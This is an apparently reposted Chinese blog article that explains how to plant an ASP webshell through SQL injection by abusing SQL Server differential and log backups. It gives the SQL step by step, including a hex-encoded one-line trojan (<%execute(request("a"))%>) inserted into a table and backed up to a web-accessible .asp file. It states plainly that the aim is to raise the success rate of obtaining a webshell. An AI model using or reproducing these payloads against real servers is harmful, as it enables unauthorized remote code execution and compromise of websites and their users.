差异备份与LOG备份的区别

韩小末

作者：撕碎了的小C
文章觉得很不错，转载过来大家一起学习
____________________
差异备份是针对完全备份：备份上一次的完全备份后发生变化的所有文件
增量备份就是LOG备份，它是针对于上一次备份（无论是哪种备份）：备份上一次备份后，所有发生变化的文件。

对于差异备份来说，只要前一次备份后，插入新的内容，差异备份就可以把刚插入的内容备份出来，而这个备份文件将大大减少,这样插入数据得以执行的概率也大大增加，得到webShell的成功自然也会提高了不少。其主要SQL语句为：
1首先完整备份一次(c:\ddd.bak为所备份未见)
backup database 库名 to disk = 'c:\ddd.bak';--
2.创建表并插曲入数据
create table [dbo].[dtest] ([cmd] [image]);
insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--
3.进行差异备份
backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
上面
0x3C25657865637574652872657175657374282261222929253E
就是一句话木马的内容：<%execute(request("a"))%>

而LOG备份需要先把指定的数据库激活为还原模式，所以需要执行alter database XXX set RECOVERY FUL，而差异备份不需要，所以只有这条语句的就是LOG备份。它的基本步骤如下：
alter database XXXX set RECOVERY FULL
backup log XXXX to disk = 'c:\Sammy' with init
create table cmd (a image)
insert into cmd (a) values ('')
backup log XXXX to disk = 'c:\xxx\2.asp'
它只比差异备份多了一句SQL语句，就是那个激活的语句，但很多是时候LOG备份产生的文件更小，所以我们一般选择LOG备份。